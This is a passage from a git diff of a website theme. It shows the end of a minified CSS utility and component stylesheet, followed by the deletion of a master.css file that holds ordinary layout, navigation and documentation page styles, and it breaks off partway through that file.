.min-w5{min-width:5%}.min-w10{min-width:10%}.min-w15{min-width:15%}.min-w20{min-width:20%}.min-w25{min-width:25%}.min-w30{min-width:30%}.min-w35{min-width:35%}.min-w40{min-width:40%}.min-w45{min-width:45%}.min-w50{min-width:50%}.min-w55{min-width:55%}.min-w60{min-width:60%}.min-w65{min-width:65%}.min-w70{min-width:70%}.min-w75{min-width:75%}.min-w80{min-width:80%}.min-w85{min-width:85%}.min-w90{min-width:90%}.min-w95{min-width:95%}.min-w100{min-width:100%}.h25{height:25%}.h50{height:50%}.h100{height:100%}.group:after{content:'';display:table;clear:both}.flex{display:flex}@media (max-width:768px){.gutters .column.push-left-sm,.push-left-sm{margin-left:0}.gutters .column.push-center-sm,.push-center-sm{margin-left:auto;margin-right:auto}.push-top-sm{margin-top:0}.align-left-sm{justify-content:flex-start}.float-left,.float-right{float:none}.w-auto-sm{width:auto}.w-big,.w-large,.w-medium,.w-small,.w100-sm{width:100%}.max-w-auto-sm,.max-w-big,.max-w-large,.max-w-medium,.max-w-small{max-width:auto}.flex-column-sm{flex-direction:column}.flex-w100-sm{flex:0 0 100%}}@media (max-width:768px) and (max-width:768px){.flex-w100-sm{flex:0 0 100%!important}}.invisible{visibility:hidden}.visible{visibility:visible}.display-block{display:block}.hide{display:none!important}@media (max-width:768px){.hide-sm{display:none!important}}@media (min-width:768px){.show-sm{display:none!important}}@media print{.hide-print{display:none!important}.show-print{display:block!important}}.caret,.close{display:inline-block}.no-scroll{overflow:hidden;width:100%;height:100%!important}.scrollbar-measure{position:absolute;top:-9999px;width:50px;height:50px;overflow:scroll}.dropdown,.slideDown,.slideUp{overflow:hidden}.video-container{height:0;padding-bottom:56.25%;position:relative;margin-bottom:16px}.video-container embed,.video-container iframe,.video-container object{position:absolute;top:0;left:0;width:100%!important;height:100%!important}.close{min-height:16px;min-width:16px;line-height:16px;vertical-align:middle;text-align:center;opacity:.6}.close:hover{opacity:1}.close.small{font-size:8px}.close.big{font-size:18px}.close.white{color:#fff}.button .caret{margin-right:-8px}.overlay{position:fixed;z-index:200;top:0;left:0;right:0;bottom:0;background-color:rgba(255,255,255,.95)}.overlay>.close{position:fixed;top:1rem;right:1rem}@media print{blockquote,img,pre,tr{page-break-inside:avoid}*{background:0 0!important;color:#000!important;box-shadow:none!important;text-shadow:none!important}a,a:visited{text-decoration:underline}blockquote,pre{border:1px solid #999}h2,h3,p{orphans:3;widows:3}thead{display:table-header-group}img{max-width:100%!important}h2,h3,h4{page-break-after:avoid}@page{margin:.5cm}}.dropdown,.modal{box-shadow:0 10px 25px rgba(0,0,0,.15)}@keyframes slideUp{to{height:0;padding-top:0;padding-bottom:0}}@keyframes slideDown{from{height:0;padding-top:0;padding-bottom:0}}@keyframes fadeIn{from{opacity:0}to{opacity:1}}@keyframes fadeOut{from{opacity:1}to{opacity:0}}@keyframes flipIn{from{opacity:0;transform:scaleY(0)}to{opacity:1;transform:scaleY(1)}}@keyframes flipOut{from{opacity:1;transform:scaleY(1)}to{opacity:0;transform:scaleY(0)}}@keyframes zoomIn{from{opacity:0;transform:scale3d(.3,.3,.3)}50%{opacity:1}}@keyframes zoomOut{from{opacity:1}50%{opacity:0;transform:scale3d(.3,.3,.3)}to{opacity:0}}@keyframes slideInRight{from{transform:translate3d(100%,0,0);visibility:visible}to{transform:translate3d(0,0,0)}}@keyframes slideInLeft{from{transform:translate3d(-100%,0,0);visibility:visible}to{transform:translate3d(0,0,0)}}@keyframes slideInDown{from{transform:translate3d(0,-100%,0);visibility:visible}to{transform:translate3d(0,0,0)}}@keyframes slideOutLeft{from{transform:translate3d(0,0,0)}to{visibility:hidden;transform:translate3d(-100%,0,0)}}@keyframes slideOutRight{from{transform:translate3d(0,0,0)}to{visibility:hidden;transform:translate3d(100%,0,0)}}@keyframes slideOutUp{from{transform:translate3d(0,0,0)}to{visibility:hidden;transform:translate3d(0,-100%,0)}}@keyframes rotate{from{transform:rotate(0)}to{transform:rotate(360deg)}}@keyframes pulse{from,to{transform:scale3d(1,1,1)}50%{transform:scale3d(1.03,1.03,1.03)}}@keyframes shake{15%{transform:translateX(.5rem)}30%{transform:translateX(-.4rem)}45%{transform:translateX(.3rem)}60%{transform:translateX(-.2rem)}75%{transform:translateX(.1rem)}90%{transform:translateX(0)}}.fadeIn{animation:fadeIn 250ms}.fadeOut{animation:fadeOut 250ms}.zoomIn{animation:zoomIn .2s}.zoomOut{animation:zoomOut .5s}.slideInRight{animation:slideInRight .5s}.slideInLeft{animation:slideInLeft .5s}.slideInDown{animation:slideInDown .5s}.slideOutLeft{animation:slideOutLeft .5s}.slideOutRight{animation:slideOutRight .5s}.slideOutUp{animation:slideOutUp .5s}.slideUp{animation:slideUp .2s ease-in-out}.slideDown{animation:slideDown 80ms ease-in-out}.flipIn{animation:flipIn 250ms cubic-bezier(.5,-.5,.5,1.5)}.flipOut{animation:flipOut .5s cubic-bezier(.5,-.5,.5,1.5)}.rotate{animation:rotate .5s}.pulse{animation:pulse 250ms 2}.shake{animation:shake .5s}.dropdown{position:absolute;z-index:100;top:0;right:0;width:280px;color:#000;font-size:15px;background:#fff;border-radius:3px;max-height:300px;margin:0;padding:0}.dropdown.dropdown-mobile{position:fixed;top:0;left:0;right:0;bottom:0;width:100%;max-height:none;border:none}.dropdown .close{margin:20px auto}.dropdown.open{overflow:auto}.dropdown ul{margin:0}.dropdown ul li{border-bottom:1px solid rgba(0,0,0,.07)}.dropdown ul li:last-child{border-bottom:none}.dropdown ul a{display:block;padding:12px;text-decoration:none;color:#000}.dropdown ul a:hover{background:rgba(0,0,0,.05)}.message{font-size:14px;background:#e0e1e1;color:#313439;padding:1rem 2.5em .75rem 1rem;margin-bottom:24px;position:relative}.message a{color:inherit}.message h2,.message h3,.message h4,.message h5,.message h6{margin-bottom:0}.message .close{position:absolute;right:1rem;top:1.1rem}.message.error{background:#f03c69;color:#fff}.message.success{background:#35beb1;color:#fff}.message.warning{background:#f7ba45}.message.focus{background:#1c86f2;color:#fff}.message.black{background:#0d0d0e;color:#fff}.message.inverted,.modal,.offcanvas{background:#fff}.modal-box{position:fixed;top:0;left:0;bottom:0;right:0;overflow-x:hidden;overflow-y:auto;z-index:200}.modal{position:relative;margin:16px auto auto;padding:0;border-radius:8px;color:#000}@media (max-width:768px){.modal input,.modal textarea{font-size:16px}}.modal .close{position:absolute;top:18px;right:16px;opacity:.3}.modal .close:hover{opacity:1}.modal-header{padding:24px 32px;font-size:18px;font-weight:700;border-bottom:1px solid rgba(0,0,0,.05)}.modal-header:empty{display:none}.modal-body{padding:36px 56px}@media (max-width:768px){.modal-body,.modal-header{padding:24px}}.offcanvas{position:fixed;padding:24px;height:100%;top:0;left:0;z-index:300;overflow-y:scroll}.offcanvas .close{position:absolute;top:8px;right:8px}.offcanvas-push-body,.tabs a,.tabs em{position:relative}.offcanvas-left{border-right:1px solid rgba(0,0,0,.1)}.offcanvas-right{left:auto;right:0;border-left:1px solid rgba(0,0,0,.1)}.tabs{margin-bottom:24px;font-size:14px}.tabs li em,.tabs li.active a{color:#313439;border:1px solid rgba(0,0,0,.1);cursor:default;text-decoration:none;background:0 0}.tabs a,.tabs em{top:1px;font-style:normal;display:block;padding:.5rem 1rem;border:1px solid transparent;color:rgba(0,0,0,.5);text-decoration:none}.tabs a:hover{-moz-transition:all linear .2s;transition:all linear .2s;color:#313439;text-decoration:underline;background-color:#e0e1e1}@media (min-width:768px){.tabs ul{display:flex;margin-top:-1px;border-bottom:1px solid rgba(0,0,0,.1)}.tabs li em,.tabs li.active a{border-bottom:1px solid #fff}}
\ No newline at end of file
diff --git a/website/src/themes/kube/static/css/master.css b/website/src/themes/kube/static/css/master.css
deleted file mode 100644
index ceb360e46c..0000000000
--- a/website/src/themes/kube/static/css/master.css
+++ /dev/null
@@ -1,1132 +0,0 @@
-body {
-  font-family: Lato, Arial, sans-serif; }
-
-h1.title, h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6 {
-  font-family: Lato, Arial, sans-serif; }
-
-button, .button {
-  font-family: Lato, Arial, sans-serif; }
-
-h1, h2, h3, h4, h5, h6 {
-  color: #222; }
-
-.form-centered {
-  max-width: 400px;
-  margin: auto;
-  margin-bottom: 140px; }
-
-.form-subscribe {
-  text-align: center;
-  border-radius: 4px;
-  border: 3px dashed rgba(0, 0, 0, 0.1);
-  padding: 64px 40px;
-  margin-bottom: 24px; }
-  .form-subscribe h4 {
-    margin-bottom: 0; }
-  .form-subscribe p {
-    color: rgba(0, 0, 0, 0.5);
-    margin-bottom: 20px; }
-  .form-subscribe form {
-    max-width: 400px;
-    margin: auto; }
-  .form-subscribe #form-subscribe-success {
-    max-width: 500px;
-    margin: auto;
-    font-size: 18px;
-    line-height: 28px; }
-  .form-subscribe #subscribe-email-validation-error {
-    margin-bottom: 8px;
-    font-size: 15px; }
-  .form-subscribe .form-subscribe-twitter div {
-    margin: 24px 0;
-    font-size: 20px;
-    color: rgba(0, 0, 0, 0.3); }
-  .form-subscribe .form-subscribe-twitter a {
-    display: inline-block;
-    padding-left: 21px;
-    background: url("/img/common/icon-twitter.png") no-repeat left 4px; }
-
-#toggle-form-subscribe {
-  text-align: center;
-  margin-bottom: 20px;
-  font-size: 15px;
-  margin-top: -20px; }
-
-#nav-toggle-box {
-  display: flex;
-  align-items: center;
-  padding: 8px 16px; }
-
-#nav-toggle {
-  margin-left: auto;
-  color: #000;
-  text-decoration: none;
-  padding: 2px 8px; }
-
-#nav-toggle-brand {
-  position: relative;
-  top: -1px; }
-
-#nav-toggle-brand a,
-#nav-toggle-brand span {
-  color: #000;
-  font-weight: bold;
-  text-decoration: none; }
-
-#top {
-  display: flex;
-  align-items: center;
-  margin-bottom: 24px;
-  padding: 0 36px;
-  height: 88px;
-  border-bottom: 1px solid rgba(0, 0, 0, 0.05); }
-  #top #top-brand {
-    margin-right: 52px; }
-    #top #top-brand span,
-    #top #top-brand a {
-      background: none;
-      text-indent: -9999px;
-      width: 70px;
-      line-height: 11px;
-      background-repeat: no-repeat; }
-
-  #top ul {
-    display: flex;
-    align-items: center;
-    margin: 0; }
-  #top #top-nav-main {
-    padding-left: 52px;
-    border-left: 1px solid rgba(0, 0, 0, 0.15); }
-    #top #top-nav-main li {
-      font-size: 16px;
-      font-weight: 500;
-      margin-right: 40px; }
-    #top #top-nav-main span,
-    #top #top-nav-main a {
-      display: inline-block; }
-    #top #top-nav-main a {
-      color: #000;
-      text-decoration: none; }
-      #top #top-nav-main a:hover {
-        -moz-transition: all linear 0.2s;
-        transition: all linear 0.2s;
-        color: rgba(0, 0, 0, 0.6);
-        text-decoration: underline; }
-    #top #top-nav-main b a,
-    #top #top-nav-main span {
-      font-weight: 500;
-      color: rgba(0, 0, 0, 0.4); }
-    #top #top-nav-main b a {
-      text-decoration: underline; }
-      #top #top-nav-main b a:hover {
-        color: #000; }
-  #top #top-nav-extra {
-    margin-left: auto;
-    font-size: 14px; }
-    #top #top-nav-extra span,
-    #top #top-nav-extra a {
-      color: rgba(0, 0, 0, 0.7);
-      display: inline-block;
-      border: 1px solid rgba(0, 0, 0, 0.5);
-      text-decoration: none;
-      line-height: 28px;
-      border-radius: 28px;
-      padding: 0 20px; }
-    #top #top-nav-extra a:hover {
-      -moz-transition: all linear 0.2s;
-      transition: all linear 0.2s;
-      color: #000;
-      text-decoration: underline; }
-    #top #top-nav-extra span {
-      color: rgba(0, 0, 0, 0.4);
-      border-color: rgba(0, 0, 0, 0.2); }
-
-#subnav {
-  margin-top: 24px;
-  margin-bottom: 24px;
-  font-size: 15px; }
-  #subnav ul {
-    margin: 0;
-    text-align: center; }
-  #subnav li {
-    display: inline-block; }
-  #subnav li.active a,
-  #subnav span {
-    color: rgba(0, 0, 0, 0.4); }
-  #subnav form,
-  #subnav em,
-  #subnav span,
-  #subnav a {
-    display: inline-block;
-    padding: 2px 16px; }
-  #subnav em {
-    font-style: normal; }
-  #subnav a {
-    color: #3794de;
-    text-decoration: none; }
-    #subnav a:hover {
-      -moz-transition: all linear 0.2s;
-      transition: all linear 0.2s;
-      color: #000;
-      text-decoration: underline; }
-  #subnav li:first-child b a {
-    color: #3794de;
-    font-weight: normal;
-    text-decoration: none; }
-    #subnav li:first-child b a:hover {
-      -moz-transition: all linear 0.2s;
-      transition: all linear 0.2s;
-      color: #000;
-      text-decoration: underline; }
-  #subnav b a {
-    color: #000;
-    text-decoration: underline; }
-    #subnav b a:hover {
-      -moz-transition: all linear 0.2s;
-      transition: all linear 0.2s;
-      color: rgba(0, 0, 0, 0.6);
-      text-decoration: underline; }
-  #subnav .action-button a {
-    background: rgba(28, 134, 242, 0.05);
-    font-size: 15px;
-    margin-left: 16px;
-    padding: 2px 16px;
-    border-radius: 3px;
-    border: 1px solid rgba(28, 134, 242, 0.5); }
-    #subnav .action-button a:hover {
-      background: #1c86f2;
-      border-color: #1c86f2;
-      color: #fff;
-      text-decoration: none; }
-  #subnav form {
-    margin: 0; }
-    #subnav form button {
-      font-size: 15px;
-      line-height: 24px;
-      color: #3794de;
-      height: auto;
-      padding: 0;
-      background: none;
-      box-shadow: none;
-      vertical-align: baseline; }
-      #subnav form button:hover {
-        -moz-transition: all linear 0.2s;
-        transition: all linear 0.2s;
-        color: #000;
-        text-decoration: underline; }
-
-#hero {
-  padding-top: 48px;
-  padding-bottom: 56px;
-  text-align: center; }
-  #hero h1 {
-    max-width: 880px;
-    margin-left: auto;
-    margin-right: auto;
-    margin-bottom: 12px;
-    font-size: 64px;
-    line-height: 72px;
-    font-weight: 900; }
-  #hero p {
-    max-width: 740px;
-    margin: auto;
-    font-size: 21px;
-    line-height: 32px;
-    color: rgba(0, 0, 0, 0.5);
-    margin-top: 28px;
-    padding-top: 28px;
-    margin-bottom: 0;
-    position: relative; }
-    #hero p a {
-      color: #000; }
-    #hero p a:hover {
-      color: rgba(0, 0, 0, 0.6); }
-    #hero p:before {
-      position: absolute;
-      content: '';
-      width: 40px;
-      height: 3px;
-      top: 0;
-      left: 50%;
-      margin-left: -20px;
-      background: #ff3366; }
-
-#intro {
-  margin-top: 56px;
-  margin-bottom: 140px;
-  text-align: center;
-  position: relative; }
-  #intro:before {
-    position: absolute;
-    content: '';
-    width: 40px;
-    height: 3px;
-    top: -68px;
-    left: 50%;
-    margin-left: -20px;
-    background: #ff3366; }
-  #intro h6 {
-    color: rgba(0, 0, 0, 0.5);
-    font-weight: normal; }
-  #intro h2 {
-    font-weight: 900; }
-    #intro h2 a {
-      color: #3794de;
-      text-decoration: none; }
-    #intro h2 a:hover {
-      -moz-transition: all linear 0.2s;
-      transition: all linear 0.2s;
-      color: #000;
-      text-decoration: underline; }
-  #intro p {
-    font-size: 15px;
-    margin: auto;
-    padding: 0 20px; }
-  @media (max-width: 768px) {
-    #intro .col {
-      margin-bottom: 48px; } }
-
-#action-buttons {
-  margin-bottom: 64px;
-  text-align: center; }
-  #action-buttons button,
-  #action-buttons .button {
-    margin: 0 4px; }
-  #action-buttons p {
-    margin: 0;
-    margin-top: 20px;
-    font-size: 13px;
-    line-height: 20px;
-    color: rgba(0, 0, 0, 0.5); }
-
-#contents {
-  counter-reset: count;
-  max-width: 400px;
-  margin: 24px auto 60px auto;
-  padding: 32px;
-  background: #fbfbfb;
-  border: 1px solid rgba(0, 0, 0, 0.08); }
-  #contents.wide {
-    max-width: none;
-    margin-bottom: 24px; }
-  #contents ol {
-    margin: 0; }
-  #contents li {
-    line-height: 40px;
-    border-bottom: 1px solid rgba(0, 0, 0, 0.06);
-    margin-right: 24px;
-    counter-increment: count; }
-  #contents li:last-child {
-    border-bottom: none; }
-  #contents a {
-    display: block;
-    text-decoration: none;
-    position: relative;
-    padding-left: 24px;
-    color: #259d92; }
-    #contents a:before {
-      position: absolute;
-      left: 0;
-      content: counter(count, decimal-leading-zero);
-      font-size: 13px;
-      color: rgba(0, 0, 0, 0.3); }
-    #contents a:hover {
-      -moz-transition: all linear 0.2s;
-      transition: all linear 0.2s;
-      color: #000;
-      text-decoration: underline; }
-
-#main {
-  margin: auto;
-  max-width: 1128px; }
-
-body.docs #main,
-body.grafs-index #main,
-body.page-redactor-index #main {
-  max-width: none; }
-
-body.grafs-index #footer,
-body.page-redactor-index #footer {
-  margin-top: 0; }
-
-body.docs #top {
-  margin-bottom: 0; }
-
-body.page-account #hero {
-  padding: 0; }
-  body.page-account #hero h1 {
-    font-size: 32px;
-    line-height: 32px;
-    margin-bottom: 48px; }
-
-.content {
-  max-width: 840px;
-  margin: auto; }
-
-#redactor-intro-box {
-  max-width: 920px;
-  margin: auto;
-  margin-bottom: 48px; }
-
-#redactor-features {
-  text-align: center;
-  margin: 136px auto;
-  max-width: 1128px; }
-
-#redactor-features h3 {
-  font-size: 21px;
-  margin-top: 0;
-  margin-bottom: 4px; }
-
-#redactor-features p {
-  color: rgba(0, 0, 0, 0.5); }
-
-#redactor-buying-desc {
-  max-width: 720px;
-  margin: auto;
-  margin-top: 40px;
-  font-size: 13px;
-  line-height: 20px; }
-
-#redactor-buying-desc p {
-  color: rgba(0, 0, 0, 0.5); }
-
-#redactor-buy-box {
-  text-align: center;
-  margin: 116px auto;
-  max-width: 1128px; }
-
-#redactor-cloud {
-  text-align: center;
-  margin: 116px auto;
-  max-width: 1128px; }
-  #redactor-cloud h2 {
-    font-size: 48px;
-    line-height: 56px;
-    margin-bottom: 36px;
-    color: rgba(0, 0, 0, 0.15); }
-  #redactor-cloud ul {
-    margin: 0;
-    list-style: none; }
-  #redactor-cloud li {
-    list-style: none;
-    display: inline;
-    line-height: 44px;
-    margin: 0 12px;
-    white-space: nowrap; }
-  #redactor-cloud li:nth-child(3n) {
-    font-size: 1.25em;
-    color: #666; }
-  #redactor-cloud li:nth-child(4n) {
-    font-size: 1.5em;
-    color: #333; }
-  #redactor-cloud li:nth-child(5n) {
-    font-size: 1em;
-    color: #999; }
-  #redactor-cloud li:nth-child(7n) {
-    font-size: 2.25em; }
-  @media (max-width: 768px) {
-    #redactor-cloud {
-      display: none; } }
-
-#redactor-discover {
-  text-align: center;
-  background: #f8f8f8;
-  padding-bottom: 96px; }
-  #redactor-discover #redactor-discover-box {
-    max-width: 1128px;
-    margin: auto; }
-  #redactor-discover h3 {
-    font-size: 24px;
-    line-height: 32px;
-    text-align: center;
-    font-weight: 900;
-    padding: 40px 0;
-    margin-bottom: 60px;
-    color: rgba(0, 0, 0, 0.25);
-    border-bottom: 1px solid rgba(0, 0, 0, 0.05); }
-  #redactor-discover h4 {
-    margin-top: 0; }
-  #redactor-discover h4 a {
-    font-size: 21px;
-    color: #000; }
-    #redactor-discover h4 a:hover {
-      -moz-transition: all linear 0.2s;
-      transition: all linear 0.2s;
-      color: rgba(0, 0, 0, 0.5); }
-  #redactor-discover figure {
-    margin-bottom: 0; }
-  #redactor-discover .col {
-    max-width: 340px; }
-  #redactor-discover p {
-    font-size: 14px;
-    line-height: 20px;
-    color: rgba(0, 0, 0, 0.5); }
-  @media (max-width: 768px) {
-    #redactor-discover .col {
-      max-width: none; }
-    #redactor-discover p {
-      padding: 0 24px; } }
-
-#grafs-matrix-box {
-  padding: 0 20px;
-  max-width: 1128px;
-  margin: auto;
-  margin-bottom: 80px; }
-  #grafs-matrix-box .item {
-    padding-top: 72px;
-    text-align: center; }
-  #grafs-matrix-box .item.first {
-    padding-top: 24px; }
-  #grafs-matrix-box h5 {
-    font-size: 17px;
-    line-height: 24px;
-    margin-bottom: 8px; }
-  #grafs-matrix-box p {
-    max-width: 340px;
-    margin: auto;
-    margin-bottom: 32px;
-    font-size: 13px;
-    line-height: 20px;
-    color: rgba(0, 0, 0, 0.7); }
-  #grafs-matrix-box .row p {
-    max-width: 280px;
-    margin-bottom: 40px; }
-
-#grafs-buy-box {
-  padding: 0 20px;
-  padding-bottom: 104px;
-  max-width: 1128px;
-  margin: auto;
-  margin-top: 128px;
-  text-align: center;
-  border-bottom: 1px solid rgba(0, 0, 0, 0.07); }
-  #grafs-buy-box h2 {
-    font-size: 30px;
-    line-height: 40px;
-    font-weight: 900;
-    margin-bottom: 72px; }
-  #grafs-buy-box .button {
-    height: 60px;
-    padding-top: 20px;
-    padding-left: 36px;
-    padding-right: 36px;
-    font-size: 19px;
-    font-weight: 500; }
-  #grafs-buy-box p.desc {
-    font-size: 13px;
-    line-height: 20px;
-    color: rgba(0, 0, 0, 0.6); }
-
-#grafs-features {
-  text-align: center;
-  max-width: 1128px;
-  margin: 88px auto 104px auto;
-  padding: 0 20px; }
-  #grafs-features figure {
-    margin-bottom: 0; }
-  #grafs-features h3 {
-    margin-top: 0;
-    font-size: 21px;
-    line-height: 32px; }
-  #grafs-features p {
-    font-size: 15px;
-    color: rgba(0, 0, 0, 0.7); }
-
-#grafs-discover {
-  text-align: center;
-  background: #f8f8f8;
-  padding-bottom: 96px; }
-  #grafs-discover #grafs-discover-box {
-    max-width: 800px;
-    margin: auto; }
-  #grafs-discover h3 {
-    font-size: 24px;
-    line-height: 32px;
-    text-align: center;
-    font-weight: 900;
-    padding: 40px 0;
-    margin-bottom: 60px;
-    color: rgba(0, 0, 0, 0.25);
-    border-bottom: 1px solid rgba(0, 0, 0, 0.05); }
-  #grafs-discover h4 {
-    margin-top: 0; }
-  #grafs-discover h4 a {
-    font-size: 21px;
-    color: #000; }
-    #grafs-discover h4 a:hover {
-      -moz-transition: all linear 0.2s;
-      transition: all linear 0.2s;
-      color: rgba(0, 0, 0, 0.5); }
-  #grafs-discover figure {
-    margin-bottom: 0; }
-  #grafs-discover .col {
-    max-width: 280px; }
-  #grafs-discover p {
-    font-size: 14px;
-    line-height: 20px;
-    color: rgba(0, 0, 0, 0.5); }
-  @media (max-width: 768px) {
-    #grafs-discover .col {
-      max-width: none; }
-    #grafs-discover p {
-      padding: 0 24px; } }
-
-.grafs-examples-row {
-  display: flex;
-  justify-content: center;
-  flex-wrap: wrap;
-  margin-bottom: 40px; }
-
-.grafs-examples-col {
-  border-radius: 3px;
-  background: #f8f8f8;
-  padding: 32px;
-  padding-bottom: 56px;
-  width: 300px;
-  margin: 0 16px;
-  margin-bottom: 24px; }
-  .grafs-examples-col figure {
-    margin-bottom: 0; }
-  .grafs-examples-col h4 {
-    font-size: 17px;
-    line-height: 28px;
-    margin-top: 0; }
-  .grafs-examples-col ul {
-    list-style: none;
-    margin: 0; }
-    .grafs-examples-col ul li {
-      font-size: 15px;
-      line-height: 36px; }
-    .grafs-examples-col ul a {
-      display: block;
-      color: #3794de;
-      text-decoration: none; }
-      .grafs-examples-col ul a:hover {
-        -moz-transition: all linear 0.2s;
-        transition: all linear 0.2s;
-        color: #000;
-        text-decoration: underline; }
-
-#grafs-example-header,
-#grafs-example-content {
-  max-width: 900px;
-  margin: auto; }
-
-#grafs-example-header {
-  margin-top: 72px;
-  margin-bottom: 44px;
-  text-align: center; }
-  #grafs-example-header .tag {
-    font-size: 13px;
-    line-height: 24px;
-    text-transform: uppercase;
-    color: rgba(0, 0, 0, 0.5);
-    margin-bottom: 8px; }
-    #grafs-example-header .tag a {
-      color: rgba(0, 0, 0, 0.6); }
-      #grafs-example-header .tag a:hover {
-        -moz-transition: all linear 0.2s;
-        transition: all linear 0.2s;
-        color: #000; }
-  #grafs-example-header h1 {
-    font-size: 48px;
-    line-height: 52px;
-    font-weight: 900; }
-
-#path {
-  font-size: 15px;
-  margin-bottom: 12px; }
-  #path a {
-    color: #3794de; }
-    #path a:hover {
-      color: #000; }
-  #path span {
-    color: rgba(0, 0, 0, 0.2);
-    font-size: 15px;
-    display: inline-block;
-    margin: 0 6px; }
-  #path b {
-    font-weight: 500;
-    color: rgba(0, 0, 0, 0.4); }
-
-#docs-main {
-  display: flex; }
-  #docs-main #side {
-    width: 24%;
-    padding: 28px 36px;
-    border-right: 1px solid rgba(0, 0, 0, 0.1); }
-    #docs-main #side nav li {
-      font-size: 15px;
-      line-height: 40px; }
-    #docs-main #side nav li a {
-      display: block;
-      color: #707070;
-      text-decoration: none; }
-      #docs-main #side nav li a:hover {
-        color: #ff3366;
-        text-decoration: underline; }
-    #docs-main #side nav span,
-    #docs-main #side nav li.active a {
-      color: #ff3366;
-      font-weight: bold; }
-      #docs-main #side nav span:hover,
-      #docs-main #side nav li.active a:hover {
-        text-decoration: none; }
-    #docs-main #side nav h6 {
-      border-top: 1px solid #eee;
-      padding-top: 16px;
-      margin-top: 8px;
-      margin-bottom: 8px; }
-  #docs-main #area {
-    width: 76%;
-    padding: 32px 64px 48px 64px; }
-    #docs-main #area h1 {
-      font-size: 36px;
-      line-height: 40px;
-      font-weight: 900;
-      margin-bottom: 28px; }
-    #docs-main #area h3 {
-      font-size: 18px;
-      line-height: 28px; }
-    #docs-main #area .lead {
-      font-size: 18px;
-      line-height: 28px;
-      margin-bottom: 24px; }
-    #docs-main #area .doc-head {
-      position: relative;
-      margin-top: 24px;
-      padding-bottom: 8px;
-      border-bottom: 1px solid #eee; }
-      #docs-main #area .doc-head span {
-        position: absolute;
-        right: 0;
-        top: 0;
-        font-weight: normal;
-        font-size: 13px;
-        color: rgba(0, 0, 0, 0.4); }
-      #docs-main #area .doc-head a {
-        text-decoration: none;
-        color: #000;
-        display: block;
-        font-size: 20px; }
-
-.chart-example {
-  position: relative;
-  margin-top: 44px;
-  margin-bottom: 40px; }
-  .chart-example.inverted {
-    padding: 32px;
-    background: #191d21; }
-    .chart-example.inverted .chart-selector a {
-      color: rgba(255, 255, 255, 0.85);
-      border-color: rgba(255, 255, 255, 0.3); }
-    .chart-example.inverted pre {
-      color: rgba(255, 255, 255, 0.85);
-      padding: 0;
-      background: #191d21; }
-
-.chart-selector {
-  text-align: center;
-  font-size: 14px;
-  margin-bottom: 24px; }
-  .chart-selector a {
-    display: inline-block;
-    background: rgba(46, 196, 182, 0.05);
-    border: 1px solid rgba(46, 196, 182, 0.25);
-    border-radius: 40px;
-    line-height: 28px;
-    padding: 0 12px;
-    color: #000;
-    text-decoration: none;
-    margin: 0 4px; }
-  .chart-selector a:hover,
-  .chart-selector a.active {
-    text-decoration: none;
-    background: #2ec4b6;
-    color: #fff;
-    border: 1px solid transparent; }
-  .chart-selector a:hover {
-    -moz-transition: all linear 0.2s;
-    transition: all linear 0.2s; }
-
-.chart-section-head {
-  text-align: center;
-  font-weight: 900;
-  margin-top: 64px;
-  margin-bottom: -16px;
-  font-size: 16px;
-  line-height: 28px; }
-
-#posts {
-  list-style: none;
-  margin: auto;
-  margin-top: 48px;
-  margin-bottom: 128px;
-  max-width: 680px;
-  text-align: center; }
-
-#posts li {
-  margin-bottom: 40px; }
-
-#posts h2 {
-  font-size: 22px;
-  font-weight: normal;
-  margin: 0;
-  line-height: 28px; }
-
-#posts h2 a {
-  color: #1eabf2;
-  text-decoration: none; }
-
-#posts h2 a:hover {
-  -moz-transition: all linear 0.2s;
-  transition: all linear 0.2s;
-  color: #000;
-  text-decoration: underline; }
-
-#posts time {
-  font-size: 12px;
-  color: rgba(0, 0, 0, 0.5); }
-
-#post-box {
-  max-width: 740px;
-  margin: auto; }
-
-#post {
-  font-size: 18px;
-  line-height: 32px;
-  margin-bottom: 40px; }
-
-#changelog {
-  max-width: 820px;
-  margin: auto;
-  margin-bottom: 104px; }
-  #changelog h3 {
-    margin-bottom: 4px; }
-  #changelog time {
-    font-size: 11px;
-    font-weight: bold;
-    display: block;
-    text-transform: uppercase;
-    margin-bottom: 40px;
-    color: rgba(0, 0, 0, 0.45); }
-  #changelog .item {
-    margin-bottom: 20px;
-    background: #f8f8f8;
-    padding: 40px; }
-  #changelog ul {
-    margin: 0;
-    list-style: none; }
-  #changelog li {
-    margin-bottom: 16px;
-    padding-bottom: 16px;
-    border-bottom: 1px solid #eee; }
-  #changelog li:last-child {
-    border-bottom: none; }
-  #changelog li .label {
-    margin-right: 4px; }
-
-#kube-features {
-  margin-top: 104px;
-  text-align: center; }
-  #kube-features h3 {
-    margin-top: 0; }
-  #kube-features .row:first-child {
-    padding-bottom: 32px;
-    margin-bottom: 64px;
-    border-bottom: 1px dashed rgba(0, 0, 0, 0.15); }
-  #kube-features p {
-    font-size: 15px;
-    color: rgba(0, 0, 0, 0.75); }
-  #kube-features .item {
-    padding: 0 24px; }
-
-#kube-faq {
-  max-width: 740px;
-  margin: auto;
-  font-size: 17px;
-  line-height: 28px;
-  margin-bottom: 104px;
-  border-top: 1px solid rgba(0, 0, 0, 0.07); }
-  #kube-faq h2 {
-    font-size: 24px;
-    font-weight: 900;
-    text-align: center;
-    line-height: 32px;
-    margin-top: 80px;
-    margin-bottom: 40px; }
-
-#components {
-  text-align: center; }
-  #components.lists {
-    text-align: left; }
-    #components.lists .item {
-      padding: 24px; }
-      #components.lists .item:hover {
-        background: #f8f8f8; }
-  #components .start {
-    font-size: 24px;
-    line-height: 32px; }
-  #components #search-box {
-    padding: 24px;
-    background: #ebf0f6;
-    margin-bottom: 24px; }
-  #components .item {
-    background: #f8f8f8;
-    padding: 68px 24px 60px 24px;
-    margin-bottom: 20px; }
-    #components .item:hover {
-      -moz-transition: all linear 0.2s;
-      transition: all linear 0.2s;
-      background: #fcfcfc; }
-  #components figure {
-    margin-bottom: 0; }
-  #components h4 {
-    font-size: 19px;
-    margin-top: 0;
-    margin-bottom: 8px; }
-    #components h4 a {
-      color: #3794de;
-      text-decoration: none; }
-    #components h4 a:hover {
-      -moz-transition: all linear 0.2s;
-      transition: all linear 0.2s;
-      color: #000;
-      text-decoration: underline; }
-  #components ul {
-    margin-left: 0;
-    margin-top: 24px;
-    list-style: none; }
-  #components li {
-    line-height: 32px;
-    margin-bottom: 4px; }
-    #components li a {
-      display: inline-block;
-      color: #3794de;
-      line-height: 24px; }
-      #components li a:hover {
-        -moz-transition: all linear 0.2s;
-        transition: all linear 0.2s;
-        color: #000;
